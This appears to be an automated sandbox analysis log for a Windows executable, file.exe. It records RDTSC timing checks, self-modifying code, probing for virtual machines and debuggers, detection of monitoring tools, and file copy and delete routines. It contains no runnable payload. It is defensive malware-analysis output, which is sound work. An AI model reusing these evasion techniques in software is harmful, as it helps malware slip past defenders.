              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74E633 second address: 74E642 instructions: 0x00000000 rdtsc 0x00000002 je 00007FF8A95A6CB8h 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74E642 second address: 74E648 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7542A7 second address: 7542AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7542AD second address: 7542C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FF8A909BC23h 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 754455 second address: 75446D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF8A95A6CBEh 0x00000007 jo 00007FF8A95A6CBCh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 756DDC second address: 756DE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 756DE4 second address: 756DEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 756DEC second address: 756DF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 756DF2 second address: 756DFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jnc 00007FF8A95A6CB6h 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 756DFF second address: 756E0D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnp 00007FF8A909BC16h 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 756E0D second address: 756E2F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF8A95A6CC6h 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 756E2F second address: 756E35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 756C28 second address: 756C2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 756C2C second address: 756C32 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 756C32 second address: 756C5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FF8A95A6CC0h 0x0000000d jmp 00007FF8A95A6CC2h 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 756C5C second address: 756C67 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 764F23 second address: 764F27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 764F27 second address: 764F4E instructions: 0x00000000 rdtsc 0x00000002 jc 00007FF8A909BC16h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FF8A909BC27h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 764F4E second address: 764F52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 771508 second address: 771510 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77125F second address: 771265 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 771265 second address: 771270 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FF8A909BC16h 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 787B4B second address: 787B69 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FF8A95A6CC8h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 787B69 second address: 787B88 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF8A909BC1Ah 0x00000007 jl 00007FF8A909BC1Ch 0x0000000d jno 00007FF8A909BC16h 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push ecx 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 787B88 second address: 787BAD instructions: 0x00000000 rdtsc 0x00000002 jns 00007FF8A95A6CB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FF8A95A6CC9h 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7869A6 second address: 7869B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FF8A909BC16h 0x0000000a jnc 00007FF8A909BC16h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 786AF8 second address: 786AFC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 786C7F second address: 786C88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 786C88 second address: 786CA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF8A95A6CC8h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 786CA4 second address: 786CA8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 786CA8 second address: 786CCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnc 00007FF8A95A6CBEh 0x0000000c popad 0x0000000d je 00007FF8A95A6CF0h 0x00000013 push eax 0x00000014 push edx 0x00000015 jnp 00007FF8A95A6CB6h 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7873CF second address: 7873E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF8A909BC1Bh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7876D7 second address: 78773A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF8A95A6CC9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jg 00007FF8A95A6CBAh 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 pushad 0x00000014 pushad 0x00000015 popad 0x00000016 push edi 0x00000017 pop edi 0x00000018 jmp 00007FF8A95A6CC8h 0x0000001d jmp 00007FF8A95A6CBDh 0x00000022 popad 0x00000023 jmp 00007FF8A95A6CBAh 0x00000028 popad 0x00000029 push eax 0x0000002a pushad 0x0000002b push edx 0x0000002c pop edx 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78BB83 second address: 78BB87 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5190265 second address: 5190300 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF8A95A6CC2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FF8A95A6CC0h 0x0000000f push eax 0x00000010 pushad 0x00000011 jmp 00007FF8A95A6CC1h 0x00000016 pushfd 0x00000017 jmp 00007FF8A95A6CC0h 0x0000001c adc si, 07D8h 0x00000021 jmp 00007FF8A95A6CBBh 0x00000026 popfd 0x00000027 popad 0x00000028 xchg eax, ebp 0x00000029 pushad 0x0000002a mov al, 14h 0x0000002c pushad 0x0000002d mov cx, dx 0x00000030 call 00007FF8A95A6CC3h 0x00000035 pop esi 0x00000036 popad 0x00000037 popad 0x00000038 mov ebp, esp 0x0000003a pushad 0x0000003b call 00007FF8A95A6CC5h 0x00000040 pushad 0x00000041 popad 0x00000042 pop eax 0x00000043 push eax 0x00000044 push edx 0x00000045 movsx edi, ax 0x00000048 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5190343 second address: 5190369 instructions: 0x00000000 rdtsc 0x00000002 mov cx, A2B1h 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FF8A909BC1Eh 0x0000000d popad 0x0000000e xchg eax, ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FF8A909BC1Ah 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5190369 second address: 519036D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 519036D second address: 5190373 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5190373 second address: 51903A7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, D593h 0x00000007 mov cx, 37EFh 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f jmp 00007FF8A95A6CC5h 0x00000014 xchg eax, ebp 0x00000015 pushad 0x00000016 call 00007FF8A95A6CBCh 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51903A7 second address: 51903E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushfd 0x00000006 jmp 00007FF8A909BC21h 0x0000000b add ax, F7B6h 0x00000010 jmp 00007FF8A909BC21h 0x00000015 popfd 0x00000016 popad 0x00000017 mov ebp, esp 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FF8A909BC1Dh 0x00000020 rdtsc
              Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 4FF9FB instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 725B92 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
              Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
              Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
              Source: C:\Users\user\Desktop\file.exe | Evaded block: after key decision
              Source: C:\Users\user\Desktop\file.exe | Evasive API call chain: GetSystemTime,DecisionNodes
              Source: C:\Users\user\Desktop\file.exe | API coverage: 4.8 %
              Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_002C18A0 lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_002C3910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,DeleteFileA,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_002CE210 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_002C1269 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_002C1250 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_002C4B29 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002C4B10 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_002C4B10
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002C23A9 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_002C23A9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002BDB80 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,GetFileAttributesA,StrCmpCA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_002BDB80
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002BDB99 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_002BDB99
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002C2390 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,0_2_002C2390
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002CCBE0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,CreateFileA,GetFileSizeEx,CloseHandle,CloseHandle,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_002CCBE0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002CD530 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_002CD530
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002CDD30 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,lstrcpy,0_2_002CDD30
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002B16A0 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_002B16A0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002B16B9 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_002B16B9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002D1BF0 lstrcpy,ExitProcess,GetSystemInfo,ExitProcess,GetUserDefaultLangID,ExitProcess,ExitProcess,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,OpenEventA,CloseHandle,Sleep,OpenEventA,CreateEventA,CloseHandle,ExitProcess,0_2_002D1BF0
              Source: file.exe, file.exe, 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
              Source: file.exe, 00000000.00000002.1780359810.00000000011AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMwareJ:
              Source: file.exe, 00000000.00000002.1780359810.00000000011AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
              Source: file.exe, 00000000.00000002.1780359810.0000000001223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: file.exe, 00000000.00000002.1780359810.00000000011F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@`"
              Source: file.exe, 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-25869
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-26005
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-25851
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-25998
              Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

              Anti Debugging

Source: C:\Users\user\Desktop\file.exe | Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | File opened: NTICE
Source: C:\Users\user\Desktop\file.exe | File opened: SICE
Source: C:\Users\user\Desktop\file.exe | File opened: SIWVID
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
